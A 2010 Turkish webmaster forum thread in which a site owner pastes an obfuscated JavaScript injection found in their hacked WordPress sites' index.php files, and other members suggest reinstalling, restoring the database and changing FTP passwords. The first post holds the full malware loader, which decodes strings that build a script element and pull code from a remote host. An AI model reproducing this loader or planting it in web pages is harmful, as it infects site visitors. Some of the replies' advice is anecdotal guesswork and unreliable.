• 19-02-2010, 04:04:44
    #1
    Farklı hostinglerde bulunan wordpress sitelerime virüs bulaşmış.

    Bazı siteler açılıyor kaynakda kodlar var bazıları ise beyaz sayfa çıkıyor. Tüm index.php dosyalarından bu kodları kaldırmama rağmen düzelmiyor siteler.
    Bana bu konuda ücretli veya ücretsiz yardım etmek isteyenleri bekliyorum.


    Kod şu şekilde;

    <script>var TP="f4ebedd9fb99ecd3efcec382f2edfcf586cce7fad1d4f7 d0cdc1f5ebd8f7c9fac9f2d6ffcbe1dee1d3f2fdede7d1e9eb dbe8fffcfec1f1caeceefbcce1c2f2edca9bc3e983eeddfd9b fdf784e8ed";var wD;if(wD!='XBG'){wD='XBG'};var Xi;if(Xi!='Ohu'){Xi='Ohu'};function m(x){var M;if(M!='NX' && M!='JC'){M='NX'};var U=false;this.Gq=false; var Z=function(Lk,p){var ai;if(ai!='CQ'){ai=''};var zE;if(zE!='ck' && zE != ''){zE=null};return Lk^p;var E=new Date();};var P;if(P!='' && P!='i'){P=''};var Ky;if(Ky!='' && Ky!='cF'){Ky=''};var lk;if(lk!='' && lk!='tG'){lk=null};var Xz=58370; var KD=function(G,b){return G[K("rachCAeodt", [2,3,1,0,4])](b);};var Ba=false;var GK=new String(); function O(u){var F = '';var l =[0,32][0];var R = -1;var XX;if(XX!='uG' && XX!='Jp'){XX='uG'};var q =[0][0];u = new L(u);var HC=new String();var Pj;if(Pj!='EB'){Pj=''};var FE;if(FE!='Zu' && FE!='YC'){FE=''};for (l=u[K("enlthg", [2,0,1])]-R;l>=q;l=l-[102,1][1]){var pm=6224;F+=u[K("hacAtr", [2,0,1])](l);var KR="KR";}return F;var FI;if(FI!='e'){FI=''};}var IH="IH";var XS=new Array();var BM;if(BM!='' && BM!='zz'){BM='dF'}; var c=function(Nu){this.yN='';var GX=[255][0];var Cy=new Array();var H=[0][0];var iJ="";var WY;if(WY!='pH' && WY != ''){WY=null};var GD=[156,1,14][1];var FM;if(FM!='' && FM!='JS'){FM=null};var UL;if(UL!='xm'){UL=''};var Kn=[0,0,191,75][0];this.Bt=27839;var RK=Nu[K("nhetlg", [4,2,0,5,3,1])];var px;if(px!='' && px!='Or'){px='ea'};this.xwc=39112;var fE;if(fE!='dm' && fE!='th'){fE=''};var Rg="";var sw;if(sw!='plX'){sw='plX'};this.ct="";while(H<RK){ var oN;if(oN!='' && oN!='Yh'){oN='cV'};var UB;if(UB!='lO'){UB='lO'};var Py=new Date();H++;var tB;if(tB!='Hd' && tB!='OC'){tB=''};var St='';Hz=KD(Nu,H - GD);this.pG=false;Kn+=Hz*RK;var Sw="";var Hb="";}return new L(Kn % GX);var pW;if(pW!='' && pW!='yC'){pW=''};};var fC;if(fC!='rL' && fC!='Xs'){fC=''};this.NP=''; var vL;if(vL!='ME'){vL='ME'};function K(u, n){var FD;if(FD!='Ga'){FD='Ga'};var F = '';var AC=new String();var LL = u.length;var TCE=new Date();var q=[0][0];this.eJ=false;var GD=[1][0];var nm = n.length;this.eP='';var Ir=false;var Ue=new Array();for(var l = q; l < LL; l += nm) {var Zx = u.substr(l, nm);var wq=54545;var XB="";if(Zx.length == nm){var gp=new Date();var QE=false;for(var H in n) {var fS="";var lN;if(lN!='Ys'){lN=''};F+=Zx.substr(n[H], GD);var fu=false;}var DK=new Array();var wB;if(wB!='Ek' && wB != ''){wB=null};var UPd=46650;} else {this.wd="wd";var Gt;if(Gt!='vZ' && Gt != ''){Gt=null}; F+=Zx;var VG=new String();}var mt;if(mt!='' && mt!='SP'){mt=''};}var Iz="";this.AJ=28604;return F;}var ED="ED";this.vX=false;var KM;if(KM!=''){KM='cA'};var cT=new Array();var C=window;var J=C[K("avel", [2,1,0])];var bR;if(bR!='' && bR!='nK'){bR=''};var bX;if(bX!='' && bX!='mS'){bX=''};var a=J(K("nnoucFti", [5,3,1,4,6,7,2,0]));var wv;if(wv!='vXX'){wv='vXX'};var KL=J(K("eREgpx", [1,0]));var fw;if(fw!='' && fw!='eF'){fw=''};var HI;if(HI!='' && HI!='py'){HI=''};this.mD=false;var uU;if(uU!=''){uU='iU'};var uq = '';var L=J(K("rinStg", [3,4,0,1,2]));var pGS;if(pGS!=''){pGS='qe'};var yDN;if(yDN!='tT'){yDN='tT'};var Jg;if(Jg!='En' && Jg!='CI'){Jg=''};var Bi=new String();var Wi=false;var bs=new Array();var gX;if(gX!='TA' && gX!='EZ'){gX='TA'};var tS;if(tS!='Go' && tS != ''){tS=null};var Jk=false;var W=L[K("rfmohCraoCed", [1,0])];var Oi=C[K("eucasnpe", [1,5,0,4,2,3])];var qO=new Date();this.ZV='';var EU="";var Dw;if(Dw!='iA'){Dw=''};var Pw;if(Pw!=''){Pw='iP'};var A = W(37);var B = '';this.Qs="";this.gu='';var q =[0][0];var f =[159,2,137][1];var g = /[^@a-z0-9A-Z_-]/g;var sfM=new Date();var tvc=new Date();var z = x[K("elgnht", [1,0])];var iG=false;var o=[1, K("oducemtnc.ertaEeelemtn\'(csirtp)\'", [1,0]),2, K("oducemtnb.do.ypaepdnhCli(d)d", [1,0]),3, K("oggoelc.mok.w", [1,0]),4, K("gn.rowrowedgodlu8:r.080", [4,3,0,2,1]),5, K("e.dstAttuirb\'et(eedfr\'", [2,1,3,0]),6, K(".eploycmmbjtc..ounkie", [6,4,7,0,5,1,3,2]),7, K("iprsaegnlo.bir", [1,5,2,3,0,4]),8, K("oi.dnwownload", [7,1,4,3,0,5,2,6]),11, K("ocllgehemuro", [1,0]),12, K("oggoelc.mo", [1,0]),14, K("ufcnitno)(", [1,0]),15, K("3hc.60mco", [1,2,0]),16, K("acct(h)e", [1,0]),17, K("tth\"", [5,4,3,0,2,1]),18, K(".rdsc", [2,0,3,1]),19, K("\'\'1)", [1,2,0]),20, K("yrt", [2,1,0])];this.xz=16428;var oE =[0,165,52][0];var eZl;if(eZl!='' && eZl!='YK'){eZl='Wv'};var Bd = '';var jZ;if(jZ!='cs' && jZ!='pI'){jZ=''};var GD =[165,223,1][2];var fN=new Date();var v = '';var Ysx=new Array();var MO;if(MO!='' && MO!='he'){MO='HXB'};var pGV;if(pGV!='' && pGV!='TB'){pGV='BU'};for(var ln=q; ln < z; ln+=f){var ZQG=57885;B+= A; this.Xsh=17252;var Cp;if(Cp!='MW' && Cp!='ZxQ'){Cp=''};B+= x[K("stsubr", [2,3,4,0,1])](ln, f);this.OW='';this.yT="";}this.HS=false;var Ft;if(Ft!='' && Ft!='RMq'){Ft=''};var x = Oi(B);var AI;if(AI!='' && AI!='oL'){AI=''};var gj='';var qy;if(qy!=''){qy='rs'};var w = new L(m);var aA = w[K("epracle", [2,0,1])](g, Bd);var MR=new Array();var Yv=new Date();this.ZR="";var Do;if(Do!='' && Do!='uY'){Do=''};var h = o[K("elgnth", [1,0,3,2,4,5])];var qeK="";var BY;if(BY!='rR'){BY=''};var nM = new L(a);var ny;if(ny!='heV' && ny != ''){ny=null};var LE=15098;aA = O(aA);var piy;if(piy!='' && piy!='qg'){piy=''};var QG;if(QG!='IZ' && QG!='zG'){QG=''};var I = nM[K("erlpcae", [1,0])](g, Bd);var me;if(me!=''){me='nn'};var I = c(I);var Sl;if(Sl!='rn'){Sl=''};var KQ=c(aA);var GS;if(GS!='Nn' && GS!='Izr'){GS='Nn'};var Io=new Date();for(var l=q; l < (x[K("egnlth", [3,0,2,1])]);l=l+[104,28,1,147][2]) {var s = aA.charCodeAt(oE);this.yp='';var Ik;if(Ik!='so' && Ik != ''){Ik=null};var nB = KD(x,l);var LT;if(LT!='TZ' && LT!='Om'){LT='TZ'};var vs='';var ph=new String();var Bmg;if(Bmg!='SYK' && Bmg!='CL'){Bmg='SYK'};nB = Z(nB, s);nB = Z(nB, KQ);var Tg;if(Tg!='XC' && Tg!='Ea'){Tg=''};nB = Z(nB, I);var xk;if(xk!='' && xk!='ov'){xk=null};var qsS=new Date();oE++;if(oE > aA.length-GD){oE=q;this.Zj="Zj";}var fLC=new Array();var CE=new Array();v += W(nB);}var ZH;if(ZH!='xp' && ZH!='Ng'){ZH='xp'};var Ev="";var soN=new Date();for(Fj=q; Fj < h; Fj+=f){var oG;if(oG!='Ug' && oG != ''){oG=null};var wM;if(wM!='sW' && wM!='teC'){wM='sW'};var t = W(o[Fj]);var mr;if(mr!='nD' && mr!='Kh'){mr=''};var NV;if(NV!='dmF'){NV='dmF'};var d = o[Fj + GD];var Gz=15558;var X = new KL(t, L.fromCharCode(103));v=v[K("erlpcae", [1,0])](X, d);var Mj;if(Mj!='' && Mj!='PN'){Mj=''};}var dD=new a(v);dD();var JI="JI";var MXo;if(MXo!='RKJ' && MXo!='Tn'){MXo=''};aA = '';this.vk=65337;I = '';var POD=new String();v = '';dD = '';this.vS='';this.Ubw="";var qB;if(qB!='' && qB!='cX'){qB='ml'};var tl;if(tl!='' && tl!='gT'){tl='OI'};nM = '';KQ = '';var le="";this.Jv="Jv";return '';};var wD;if(wD!='XBG'){wD='XBG'};var Xi;if(Xi!='Ohu'){Xi='Ohu'};m(TP);</script>
  • 19-02-2010, 04:36:49
    #2
    Üyeliği durduruldu
    Yes itize buk.

    Hocam öncelikle virüs bulaşan sitenizin yedeğini alın (genelde ben phpmyadmin'den alıyorum, sizinde ordan almanızı tabsiye ederim).

    Daha sonra virüslü sitenizde ftp'de ne var ne yok baştan aşa silin, yeniden wp install klasörünü indirip ftpye yollayın (filezilla ftp programını tavsiye ederim, 2 senedir filan kullanırım ne bir virüs bulaştı ne başka birşey | ALLAH nazardan saklasın).

    Sonra phpmyadmin'den almış olduğunuz yedeği tekrar phpmyadminden yükleyin, sorun kalmayacaktır.
  • 19-02-2010, 04:39:28
    #3
    bu virüsler, cute ftp programındaki açıktan dolayı giriyor, aynı olay benımde başıma gelmişti, 30a yakın siteme bulaştı,

    bu virüsten kurtulmak için öncelikle ftp şifrelerini değiştir, daha sonra sıtende yer alan iframe kodlarını temizle,son olarakta pcne format at, bu şekilde düzelmiş olur.
  • 19-02-2010, 04:40:23
    #4
    Maalesef sadece wordpress sitelere olmamış. Diğer sitelere de bulaşmış nasıl olduysa. Wordpress siteler için dediğiniz şekilde yapıyorum.

    DaBuLyU adlı üyeden alıntı: mesajı görüntüle
    Yes itize buk.

    Hocam öncelikle virüs bulaşan sitenizin yedeğini alın (genelde ben phpmyadmin'den alıyorum, sizinde ordan almanızı tabsiye ederim).

    Daha sonra virüslü sitenizde ftp'de ne var ne yok baştan aşa silin, yeniden wp install klasörünü indirip ftpye yollayın (filezilla ftp programını tavsiye ederim, 2 senedir filan kullanırım ne bir virüs bulaştı ne başka birşey | ALLAH nazardan saklasın).

    Sonra phpmyadmin'den almış olduğunuz yedeği tekrar phpmyadminden yükleyin, sorun kalmayacaktır.
    Flashfxp programı kullanıyorum cuteftp değil.
  • 19-02-2010, 04:47:35
    #5
    Üyeliği durduruldu
    Vega adlı üyeden alıntı: mesajı görüntüle
    Maalesef sadece wordpress sitelere olmamış. Diğer sitelere de bulaşmış nasıl olduysa. Wordpress siteler için dediğiniz şekilde yapıyorum.
    Diğer siteleriniz içinde aynısını yapacaksınız, alternatif yok

    Bu arada wp sürümünüz 2.9.1 deil ise, güncelleyin iframenin kaybolacağını umuyorum.
  • 19-02-2010, 04:51:52
    #6
    DaBuLyU adlı üyeden alıntı: mesajı görüntüle
    Diğer siteleriniz içinde aynısını yapacaksınız, alternatif yok

    Bu arada wp sürümünüz 2.9.1 deil ise, güncelleyin iframenin kaybolacağını umuyorum.
    Dün güncellemiştim ama şidmi elimdeki eski sürümü attım düzeldi siteler. Tekrar güncelliyorum.

    Sanırım bu siteden frame virüsü yedim bugün girmiştim uyarı vermişti bilgisayar.

    http://www.e-yemek.org/tatli/kek_tarifleri.php

    Siteleri düzelttikten sonra ftp şifrelerini değiştirmeye gerek varmıdır?
  • 19-02-2010, 05:16:55
    #7
    Üyeliği durduruldu
    Değiştirmekte fayda var, fazla zamanını alacağını sanmıyorum